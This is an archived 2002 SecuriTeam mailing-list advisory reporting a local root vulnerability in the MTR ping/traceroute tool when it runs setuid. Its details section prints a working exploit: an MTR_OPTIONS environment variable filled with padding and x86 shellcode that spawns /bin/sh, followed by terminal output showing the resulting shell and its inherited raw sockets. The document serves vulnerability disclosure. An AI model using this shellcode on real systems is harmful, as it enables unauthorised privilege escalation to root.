[EXPL] MTR Allows Local Users to Gain Root Privileges

From: support@securiteam.com
Date: 03/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 11:54:06 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  MTR Allows Local Users to Gain Root Privileges
------------------------------------------------------------------------

SUMMARY

 <http://www.bitwizard.nl/mtr/> MTR is a network diagnostic tool that
combines 'ping' and 'traceroute' into one program. A security
vulnerability in the product allows execution of arbitrary code, and
gaining of elevated privileges. It should be noted that MTR's author does
not recommend that the program be executed a setuid root.

DETAILS

Exploit code:
The sample exploit is TRIVIAL because of strtok/while loop in vulnerable
code.

$ uname -smr
Linux 2.4.8-26mdk i686
$ setenv MTR_OPTIONS `perl -e 'print "A "x130 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08
\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
$ ./mtr
sh-2.05$

At this point, exec'd shell has a raw socket opened:

$ /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400
00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401
00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 ->
socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 ->
socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 ->
/proc/17318/fd

ADDITIONAL INFORMATION

The information has been provided by <mailto:venglin@freebsd.lublin.pl>
Przemyslaw Frasunek.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.